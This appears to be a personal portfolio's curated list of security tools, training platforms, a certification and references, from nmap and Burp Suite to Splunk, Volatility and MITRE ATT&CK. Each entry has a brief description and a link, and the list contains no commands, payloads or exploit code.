Handpicked tools, platforms, certifications, and references used in real offensive security practice. No padding โ only what actually gets used.
The gold standard for network discovery and port scanning. Used in lab and authorised review work for service enumeration and OS fingerprinting.
nmap.org โFast passive subdomain discovery using multiple data sources. Essential for initial attack surface mapping before any active recon.
GitHub โNext-generation crawling and spidering framework from Project Discovery. Discovers endpoints, JS files, and hidden paths automatically.
GitHub โSearch engine for internet-connected devices. Invaluable for passive recon โ find exposed services, open ports, and misconfigured assets.
shodan.io โGather emails, domains, subdomains, IPs and URLs from multiple public sources. Useful for early passive research and footprint mapping.
GitHub โFast multi-purpose HTTP toolkit for probing web servers. Pairs perfectly with subfinder for rapid alive-host detection and status fingerprinting.
GitHub โThe industry standard for web app pentesting. Used for intercepting requests, testing for IDOR, XSS, SQLi, auth flaws, and business logic bugs.
Download Free โAutomated SQL injection detection and exploitation. Supports all major SQL databases and injection techniques. Lab use only.
sqlmap.org โFast template-based vulnerability scanner. 9,000+ community templates covering CVEs, misconfigs, exposed panels, and more.
GitHub โFast web fuzzer written in Go. Used for directory and file discovery, parameter fuzzing, and virtual host enumeration.
GitHub โThe best free web security lab platform available. Covers every OWASP Top 10 category with hands-on, guided labs.
Start Learning โOWASP's open source web application security scanner. Good for automated baseline scanning and integration into CI/CD pipelines.
zaproxy.org โThe definitive tool for testing JSON Web Tokens. Covers signature algorithm confusion (none/RS256โHS256), weak secrets, claim tampering, and key injection attacks. Essential for any API security review.
GitHub โDiscovers hidden HTTP parameters on API endpoints and web forms. Uncovers mass assignment vulnerabilities, undocumented parameters, and hidden functionality that automated scanners miss.
GitHub โContext-aware API endpoint discovery tool from Assetnote. Uses real API route wordlists derived from public API specs โ far more effective than generic directory bruting for API discovery.
GitHub โIndustry standard for API interaction and testing. Excellent for manually testing REST endpoints, managing auth tokens, building test collections, and chaining requests to test for BOLA and auth bypass.
postman.com โVisualises GraphQL schemas as an interactive graph. Essential for understanding a GraphQL API's full capability surface โ identifying relationships, queries, and mutations that could be exploited.
GitHub โThe 2023 edition covers BOLA, Broken Auth, BOPLA, Unrestricted Resource Consumption, BFLA, SSRF via APIs, and more. The definitive reference for any structured API security assessment.
owasp.org โWorld's fastest GPU-accelerated password recovery tool. Supports 350+ hash types including NTLM, bcrypt, SHA-256, MD5, and WPA2. Essential for post-exploitation credential auditing in lab environments.
hashcat.net โClassic, versatile password cracker supporting hundreds of hash formats. Excellent for cracking /etc/shadow entries, ZIP passwords, and common hash types. Great Hashcat complement for CPU-based cracking.
openwall.com โThe most comprehensive collection of wordlists for security testing โ passwords, usernames, directory names, subdomains, fuzzing payloads, and more. The first thing to install on any pentest setup.
GitHub โSwiss army knife for network authentication assessment. Tests credentials against SMB, WinRM, MSSQL, and more in one tool. Invaluable for internal network labs and AD environments. Lab use only.
GitHub โBrowser-based CTF and learning paths covering offensive security, SOC analysis, and cloud security. Ideal for beginners through intermediate. Charlie's personal primary learning platform.
tryhackme.com โIntermediate-to-advanced labs with retired machines, ProLabs, and CTF challenges. Useful for structured practice once the basics are stable.
hackthebox.com โPractical courses from industry professionals. Useful for building hands-on offensive security foundations and reporting discipline.
tcm-sec.com โStructured training programs covering penetration testing, mobile security, and web application testing. Solid foundations for beginners entering the field.
ine.com โCarnegie Mellon's beginner-friendly CTF platform. Excellent entry point for students learning binary exploitation, web, and forensics.
picoctf.org โClassic wargames (Bandit, Natas, Leviathan) for learning Linux fundamentals, web, and exploitation basics via SSH challenges.
overthewire.org โThis section only lists credentials and learning evidence backed by the supplied CV, ISC2 certificate, or public profile links. It intentionally avoids target-certification claims.
ISC2 Certified in Cybersecurity (CC), completed 2026, backed by the supplied ISC2 certificate.
Listed in the supplied CV. Related CV-backed items include Web Fundamentals, Pre Security, and Cisco Introduction to Cybersecurity.
Supplied CV evidence lists 149+ TryHackMe rooms, 26 badges, top 3% TryHackMe ranking, and Hack The Box practice.
Industry-leading SIEM. Search Processing Language (SPL) is used for log analysis, alert creation, dashboards, and correlation rules in lab and learning contexts.
splunk.com โElasticsearch + Logstash + Kibana. The most widely deployed open-source log stack. KQL for threat hunting, Elastic Defend for EDR, Winlogbeat/Filebeat for log shipping. Fully self-hosted and free.
elastic.co โCloud-native SIEM on Azure Log Analytics. KQL is used for hunting and detection, with native M365, Defender for Endpoint, Azure AD, analytics rule, workbook, and automation support.
azure.microsoft.com โThe definitive network protocol analyser. Used for PCAP analysis, identifying C2 traffic, DNS tunnelling, lateral movement over the network, and suspicious connection patterns. Essential for both SOC work and DFIR.
wireshark.org โWindows System Monitor โ provides rich endpoint telemetry including process creation (EID 1), network connections (EID 3), file creation (EID 11), and registry modification (EID 13). The foundation of effective Windows endpoint detection.
Microsoft Sysinternals โThe gold standard for memory forensics. Extracts processes, network connections, registry hives, injected code, and malware artefacts from RAM dumps. Used for malware analysis, incident response, and identifying fileless attacks.
volatilityfoundation.org โGCHQ's Swiss Army knife for data analysis. Decodes Base64, deobfuscates malware strings, converts timestamps, defangs IOCs, extracts domains from URLs, and runs 300+ operations in a drag-and-drop interface. Daily analyst tool.
gchq.github.io โOpen standard for SIEM-agnostic detection rules. Sigma rules can be compiled to SPL, KQL, Lucene, and more via pySigma. The preferred format for writing and sharing detection logic across SIEM platforms.
GitHub โOpen-source security incident response platform โ case management, alert triaging, observable tracking, and task assignment for SOC teams. Integrates with MISP for threat intelligence correlation. The backbone of structured IR workflows.
thehive-project.org โMalware Information Sharing Platform โ collects, shares, and correlates threat intelligence including IOCs, TTPs, and malware samples. Used by SOC teams to enrich alerts with context from global threat intelligence feeds.
misp-project.org โAdvanced endpoint visibility and forensics tool using VQL (Velociraptor Query Language). Enables rapid artefact collection, live forensics, and threat hunting across fleets of endpoints from a single interface.
velocidex.com โAnalyses files, URLs, IPs, and domains against 70+ antivirus engines and threat intelligence sources. Primary tool for IOC enrichment during alert triage โ lookup suspicious hashes, domains, and IPs instantly.
virustotal.com โVisual link analysis tool for relationship mapping between people, domains, IPs, and organisations. Community edition is free.
maltego.com โFind and verify professional email addresses associated with a domain. Useful for social engineering assessment scoping.
hunter.io โFull-featured web reconnaissance framework with modular design. Automates OSINT collection across dozens of data sources.
GitHub โComprehensive directory of OSINT tools organised by data type. Useful reference for finding the right tool for a specific intelligence requirement.
osintframework.com โCurated list of Unix binaries that can be abused to bypass local security restrictions. Useful as a privilege-escalation reference during lab work.
gtfobins.github.io โWindows equivalent of GTFOBins โ native binaries, scripts, and libraries that can be misused for offensive purposes during authorised labs or scoped work.
lolbas-project.github.io โThe most comprehensive free pentesting methodology and technique reference. Covers everything from initial recon to post-exploitation in depth.
book.hacktricks.xyz โMassive repository of useful payloads and bypasses for web application security testing. Covers XSS, SQLi, SSRF, RCE, and dozens more.
GitHub โThe definitive list of the most critical web application security risks. Understanding this list is the foundation of any web security career.
owasp.org โGlobally-accessible knowledge base of adversary tactics and techniques. Used for threat modelling, red team planning, and detection alignment.
attack.mitre.org โ